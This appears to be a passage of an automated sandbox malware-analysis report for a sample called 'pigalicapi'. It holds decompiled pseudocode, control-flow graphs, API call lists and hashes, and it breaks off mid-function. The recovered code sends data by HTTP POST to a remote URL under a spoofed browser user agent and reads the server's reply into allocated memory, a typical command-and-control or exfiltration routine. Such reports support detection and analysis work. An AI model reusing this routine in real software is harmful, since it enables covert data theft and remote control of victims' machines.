                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559037175.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.559758809.0000000000420000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Color3fMessageVertex2fWindow$ClearLoadMatrixObject$BeginBuffersClassColorCreateCursorDestroyDispatchExitIconLinkOpenPeekProcessPushRegisterRotatefShowSleepStockSwapSymbolicTranslate
                                                                                                                                                                                                                                                                          • String ID: $n@@$n@@$w@@
                                                                                                                                                                                                                                                                          • API String ID: 3509731714-3974239601
                                                                                                                                                                                                                                                                          • Opcode ID: 31a8f6508b6a69f61902bea075c8000fa891c0c2f27cafeab63b9a8dec4b5150
                                                                                                                                                                                                                                                                          • Instruction ID: 3f63ee1ad5c8460eb48b3716f0d43e342052f4db54b8eddb3283573a26ff4ac5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a8f6508b6a69f61902bea075c8000fa891c0c2f27cafeab63b9a8dec4b5150
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB1B6B09043059BDB00FFA9C55939EBFF0AB44308F50893EE484AB395E7799949CF96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 474 4001840-4001854 475 4001c95-4001c9b 474->475 476 400185a-400185e 474->476 476->475 477 4001864-4001868 476->477 477->475 478 400186e-4001872 477->478 478->475 479 4001878-400190a call 4007d20 InternetCrackUrlA 478->479 479->475 482 4001910-4001930 InternetOpenA 479->482 482->475 483 4001936-4001969 InternetConnectA 482->483 484 4001c88-4001c8f InternetCloseHandle 483->484 485 400196f-40019a7 HttpOpenRequestA 483->485 484->475 486 4001c7b-4001c82 InternetCloseHandle 485->486 487 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 485->487 486->484 488 40019eb-40019f9 487->488 489 4001c6e-4001c75 InternetCloseHandle 487->489 490 4001a04-4001a26 InternetSetOptionA 488->490 491 40019fb-40019fe 488->491 489->486 492 4001a30-4001a75 call 4007d20 HttpSendRequestA 490->492 491->490 495 4001a7b-4001aa1 HttpQueryInfoA 492->495 496 4001c4c-4001c5f 492->496 497 4001aa3-4001abc call 4007dd0 495->497 498 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 495->498 496->489 499 4001c61-4001c68 496->499 497->498 504 4001abe-4001ac7 497->504 505 4001b11-4001b2d call 4007dd0 498->505 506 4001b47-4001b6a VirtualAlloc 498->506 499->489 499->492 504->498 505->506 515 4001b2f-4001b39 505->515 507 4001b70-4001b93 506->507 508 4001c19 506->508 510 4001b99-4001bc9 InternetReadFile 507->510 511 4001c23-4001c4a InternetReadFile 508->511 513 4001bdb-4001be2 510->513 514 4001bcb-4001bd9 510->514 511->496 511->511 516 4001be4 513->516 517 4001be6-4001c11 513->517 514->513 515->506 518 4001b3b-4001b41 515->518 519 4001c17 516->519 520 4001c13 517->520 521 4001c15 517->521 518->506 519->496 520->519 521->510
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                          				char _v1300;
                                                                                                                                                                                                                                                                          				char _v1564;
                                                                                                                                                                                                                                                                          				void* _v1568;
                                                                                                                                                                                                                                                                          				void* _v1572;
                                                                                                                                                                                                                                                                          				char* _v1576;
                                                                                                                                                                                                                                                                          				intOrPtr _v1588;
                                                                                                                                                                                                                                                                          				char* _v1592;
                                                                                                                                                                                                                                                                          				signed short _v1612;
                                                                                                                                                                                                                                                                          				intOrPtr _v1616;
                                                                                                                                                                                                                                                                          				char* _v1620;
                                                                                                                                                                                                                                                                          				void* _v1636;
                                                                                                                                                                                                                                                                          				void* _v1640;
                                                                                                                                                                                                                                                                          				void* _v1644;
                                                                                                                                                                                                                                                                          				void* _v1648;
                                                                                                                                                                                                                                                                          				long _v1652;
                                                                                                                                                                                                                                                                          				void _v1656;
                                                                                                                                                                                                                                                                          				void _v1916;
                                                                                                                                                                                                                                                                          				long _v1920;
                                                                                                                                                                                                                                                                          				long _v1924;
                                                                                                                                                                                                                                                                          				long _v1928;
                                                                                                                                                                                                                                                                          				void* _v1932;
                                                                                                                                                                                                                                                                          				intOrPtr _v1936;
                                                                                                                                                                                                                                                                          				long _v1940;
                                                                                                                                                                                                                                                                          				long _v1944;
                                                                                                                                                                                                                                                                          				long _v1948;
                                                                                                                                                                                                                                                                          				void _v2972;
                                                                                                                                                                                                                                                                          				long _v2976;
                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                          				long _t151;
                                                                                                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                          				void* _t196;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L37:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v1644 = 0;
                                                                                                                                                                                                                                                                          					_v1640 = 0;
                                                                                                                                                                                                                                                                          					_v1568 = 0;
                                                                                                                                                                                                                                                                          					_v1576 = "*/*";
                                                                                                                                                                                                                                                                          					_v1572 = 0;
                                                                                                                                                                                                                                                                          					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                          					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                          					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                          					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                          					_v1616 = 0x104;
                                                                                                                                                                                                                                                                          					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                          					_v1588 = 0x104;
                                                                                                                                                                                                                                                                          					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1644 = _t117;
                                                                                                                                                                                                                                                                          					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                          					_v1640 = _t119;
                                                                                                                                                                                                                                                                          					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                          						L36:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                          					_v1568 = _t123;
                                                                                                                                                                                                                                                                          					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                          					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                          					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                          					if(_a28 > 0) {
                                                                                                                                                                                                                                                                          						_v1656 = _a28;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                          					_v1652 = 1;
                                                                                                                                                                                                                                                                          					_v1648 = 0;
                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                          						_v1920 = 0x100;
                                                                                                                                                                                                                                                                          						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1924 = 0;
                                                                                                                                                                                                                                                                          						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1936 = _t137;
                                                                                                                                                                                                                                                                          							if(_a32 != 0) {
                                                                                                                                                                                                                                                                          								_t137 = _a32;
                                                                                                                                                                                                                                                                          								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                          						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                          							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                          							_v1940 = _t151;
                                                                                                                                                                                                                                                                          							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                          								_v1928 = _v1940;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          						_v1932 = _t143;
                                                                                                                                                                                                                                                                          						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                          							_v2976 = 0;
                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                          							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                          							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                          							_v1944 = _v1928;
                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                          								_v1948 = 0;
                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                                                                                                                          									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                          								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                          								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                                                                                          						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                          					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}










































                                                                                                                                                                                                                                                                          0x04001849
                                                                                                                                                                                                                                                                          0x04001854
                                                                                                                                                                                                                                                                          0x04001c95
                                                                                                                                                                                                                                                                          0x04001c9b
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                          0x04001882
                                                                                                                                                                                                                                                                          0x0400188c
                                                                                                                                                                                                                                                                          0x04001896
                                                                                                                                                                                                                                                                          0x040018a0
                                                                                                                                                                                                                                                                          0x040018b5
                                                                                                                                                                                                                                                                          0x040018ba
                                                                                                                                                                                                                                                                          0x040018bd
                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                          0x040018d3
                                                                                                                                                                                                                                                                          0x040018e3
                                                                                                                                                                                                                                                                          0x040018e9
                                                                                                                                                                                                                                                                          0x04001902
                                                                                                                                                                                                                                                                          0x0400190a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400191d
                                                                                                                                                                                                                                                                          0x04001923
                                                                                                                                                                                                                                                                          0x04001930
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001956
                                                                                                                                                                                                                                                                          0x0400195c
                                                                                                                                                                                                                                                                          0x04001969
                                                                                                                                                                                                                                                                          0x04001c88
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                          0x04001994
                                                                                                                                                                                                                                                                          0x0400199a
                                                                                                                                                                                                                                                                          0x040019a7
                                                                                                                                                                                                                                                                          0x04001c7b
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                          0x040019c2
                                                                                                                                                                                                                                                                          0x040019c8
                                                                                                                                                                                                                                                                          0x040019e5
                                                                                                                                                                                                                                                                          0x04001c6e
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                          0x040019eb
                                                                                                                                                                                                                                                                          0x040019f9
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                          0x04001a16
                                                                                                                                                                                                                                                                          0x04001a1c
                                                                                                                                                                                                                                                                          0x04001a26
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                          0x04001a48
                                                                                                                                                                                                                                                                          0x04001a4d
                                                                                                                                                                                                                                                                          0x04001a50
                                                                                                                                                                                                                                                                          0x04001a6d
                                                                                                                                                                                                                                                                          0x04001a75
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001aa1
                                                                                                                                                                                                                                                                          0x04001aaa
                                                                                                                                                                                                                                                                          0x04001aaf
                                                                                                                                                                                                                                                                          0x04001ab2
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001abe
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                          0x04001ad7
                                                                                                                                                                                                                                                                          0x04001adc
                                                                                                                                                                                                                                                                          0x04001adf
                                                                                                                                                                                                                                                                          0x04001b0f
                                                                                                                                                                                                                                                                          0x04001b18
                                                                                                                                                                                                                                                                          0x04001b1d
                                                                                                                                                                                                                                                                          0x04001b20
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                          0x04001b57
                                                                                                                                                                                                                                                                          0x04001b5d
                                                                                                                                                                                                                                                                          0x04001b6a
                                                                                                                                                                                                                                                                          0x04001c19
                                                                                                                                                                                                                                                                          0x04001c23
                                                                                                                                                                                                                                                                          0x04001c3d
                                                                                                                                                                                                                                                                          0x04001c43
                                                                                                                                                                                                                                                                          0x04001b70
                                                                                                                                                                                                                                                                          0x04001b79
                                                                                                                                                                                                                                                                          0x04001b84
                                                                                                                                                                                                                                                                          0x04001b86
                                                                                                                                                                                                                                                                          0x04001b93
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                          0x04001bbf
                                                                                                                                                                                                                                                                          0x04001bc9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                          0x04001be2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001bf2
                                                                                                                                                                                                                                                                          0x04001c04
                                                                                                                                                                                                                                                                          0x04001c11
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c15
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001be4
                                                                                                                                                                                                                                                                          0x04001c4c
                                                                                                                                                                                                                                                                          0x04001c55
                                                                                                                                                                                                                                                                          0x04001c5b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001a30

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                          • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                          • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                          • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                          • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                          • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                          			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				HANDLE* _v64;
                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                          				HANDLE* _v104;
                                                                                                                                                                                                                                                                          				HANDLE* _v108;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                          				void* _t188;
                                                                                                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                          					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                          					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                          					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          					_v16 = _a24;
                                                                                                                                                                                                                                                                          					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                          					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                          					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t198 = _v56;
                                                                                                                                                                                                                                                                          						if(_v56 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						ResetEvent(_v20);
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t114;
                                                                                                                                                                                                                                                                          						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                          						_v64 = _v104;
                                                                                                                                                                                                                                                                          						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                          						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                          						_v100 = 0;
                                                                                                                                                                                                                                                                          						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                          							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                          							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                          							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                          							_v68 =  &_v56;
                                                                                                                                                                                                                                                                          							_v72 = _a12;
                                                                                                                                                                                                                                                                          							_v92 = _a4;
                                                                                                                                                                                                                                                                          							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                          							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                          								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          							_t141 = CreateThread(0, 0, E04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                          							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                          							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                          							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                          							_v5 = 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_v108 = _v64;
                                                                                                                                                                                                                                                                          						E040097C0(_v108);
                                                                                                                                                                                                                                                                          						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                          						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                          							continue;
